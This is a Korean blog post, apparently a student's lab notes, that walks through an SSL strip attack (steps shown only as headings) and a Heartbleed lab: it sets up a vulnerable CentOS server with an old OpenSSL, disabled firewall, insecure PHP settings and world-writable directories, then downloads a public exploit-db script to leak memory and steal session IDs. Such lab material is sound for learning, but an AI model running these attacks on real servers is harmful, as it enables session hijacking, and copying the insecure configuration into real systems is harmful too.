본문 바로가기
클라우드 아키텍처 설계 기초지식/07 네트워크 보안

네트워크 보안 (3) - 최신해킹( SSL 취약점을 이용한 공격 )

by Jasie 2018. 10. 26.

최신 해킹 종류

빅데이터 인공지능 openstack ssl 해킹

  • SSL Strip

     - SSL 이란?

       전송(4)계층 보안 프로토콜, TLS(과거 명칭, Transprot Layer Security)

       HTTP 통신을 암호화하는데 사용


  1) SSL 스트립이란?


MITM 공격을 수행하고 있을 때, 해커와 타깃은 HTTP로 통신하고 정상적인 웹 서버와 해커는 HTTPS로 통신해서

   웹 서버는 비정상적인 패킷이라 판단 못하고 접속을 허용하게 되고 타깃은 비정상적인 통신을 수행한다.



SSL 스트립 공격실습




  1. iptables 설치


 


2-1. 스트립공격전 [선행] MITM공격






3. SSL strip 공격시작



4. SSL 스트립 공격후 아이디&패스워드 해킹성공 




    2) SSL 취약점을 이용한 공격(HTTPS,HeartBleed)


- 기본설정


- CentOS에서 웹서버 설치

 방화벽 끄는 방법

 setenforce 0

service iptables stop


1. VM-Ware Tool부터 설치를 한다.


2. 명령어를 설치해준다.


 명령어 (설치 순서 중요)

> rpm -Uvh openssl-1.0.1e-15.el6.x86_64.rpm

> rpm -Uvh httpd-tools-2.2.15-31.el6.centos.x86_64.rpm httpd-2.2.15-31.el6.centos.x86_64.rpm

> rpm -Uvh mod_ssl-2.2.15-31.el6.centos.x86_64.rpm


     














 -명령어를 설치중



- CentOS에서 openssl을 통한 인증서 생성


 mkdir /ssl

    openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /ssl/webserver.key -out /ssl/webserver.crt


< 설치 예시 1 >



- CentOS에서 제로보드를 이용한 홈페이지 만들기


PHP,mysql,제로보드 설치 & 설정

< 설치 순서 1 PHP>

yum install php php-devel php-pear php-mysql php-mbstring php-gd php-imap php-odbc php-xmlrpc php-xml


< 설치 순서 2 >


vi /etc/php.ini


[PHP]

short_open_tag = On 

allow_call_time_pass_reference = On 

error_reporting = E_ALL & ~E_NOTICE & ~E_DEPRECATED & ~E_USER_DEPRECATED

display_errors = On 

display_startup_errors = On 

register_globals = On 

register_long_arrays = Off 

magic_quotes_gpc = On 

magic_quotes_runtime = Off 

date.timezone = "Asia/Seoul"


< 설치 순서 3 >




< 설치 순서 4 mysql>


yum install mysql-server

service mysqld start

mysql

create database xe;

use mysql;

update user set password=password('dkagh1.') where user='root';

flush privileges;


mysql -u root -p

암호 입력


< 설치 순서 5 제로보드>


제로보드 공식 홈페이지에서 다운

리눅스로 옮기고 압축 해제

압축 풀면 나오는 xe 디렉토리를 /var/www/html 밑으로 이동

xe 디렉토리의 권한을 707로 설정, chmod 707 /var/www/html/xe


service httpd restart



- 본체PC에서 제로보드 접속 및 하트블리드 공격



제로보드 접속

 

웹 브라우저에서 http://[웹서버IP]/xe 로 접속해서 제로보드 초기 설정



한국어 -> 동의 후 다음 -> 설치를 진행합니다. -> mysql 체크 후 다음

-> * DB 아이디 root -> 다음 -> 

* 이메일 주소 admin@admin.com

* DB 비밀번호 [패스워드]

* 새 비밀번호 [암호1234.]

* 닉네임 admin

* 아이디 admin


하트블리드 공격 


칼리에서

wget https://www.exploit-db.com/download/32745.py 

python 32745.py [웹서버 IP] > hb.txt

만약 hb.txt에 PHPSESSID가 없으면

service httpd restart

다시 로그인

 다시 하트블리드 공격





공감() 과 댓글은 필자에게 큰 힘이 됩니다.

잠시 1초만 내주시면 안될까요? ~~


로그인 없이도 가능합니당 



저작자표시 비영리 변경금지

'클라우드 아키텍처 설계 기초지식 > 07 네트워크 보안' 카테고리의 다른 글

네트워크 보안 (2) - Mac스푸핑, Ip 스푸핑,DNS 스푸핑,Dos,DDoS,최신해킹 최신해킹기법  (0) 2018.10.24
네트워크 보안 (1) - 스니핑 해킹기법,스푸핑 해킹기법, 사이드 재킹  (0) 2018.10.23

관련글

댓글

티스토리툴바